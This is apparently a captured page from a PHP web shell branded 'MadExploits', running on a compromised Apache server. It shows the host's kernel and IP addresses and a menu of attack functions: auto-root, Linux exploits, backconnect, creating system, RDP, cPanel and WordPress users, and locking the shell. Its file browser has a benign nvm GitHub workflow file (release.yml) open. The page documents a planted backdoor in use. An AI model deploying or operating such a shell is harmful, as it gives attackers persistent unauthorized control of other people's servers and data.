Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.219.206.240
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
.github /
workflows /
[ HOME SHELL ]
Name
Size
Permission
Action
latest-npm.yml
985
B
-rw-rw-r--
lint.yml
959
B
-rw-rw-r--
rebase.yml
257
B
-rw-rw-r--
release.yml
715
B
-rw-rw-r--
require-allow-edits.yml
254
B
-rw-rw-r--
shellcheck.yml
760
B
-rw-rw-r--
toc.yml
750
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : release.yml
name: 'Tests: release process' on: [pull_request, push] jobs: release: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - uses: actions/setup-node@v2-beta with: node-version: "14" - run: npm install - name: Configure git run: | git config user.name github-actions git config user.email github-actions@github.com git fetch --unshallow --tags || git fetch --tags - name: Attempt `make release` process run: echo proceed | make TAG=99.99.99 release env: GIT_EDITOR: "sed -i '1 s/^/99.99.99 make release test/'" - name: Ensure tag is created run: git tag | grep v99.99.99
Close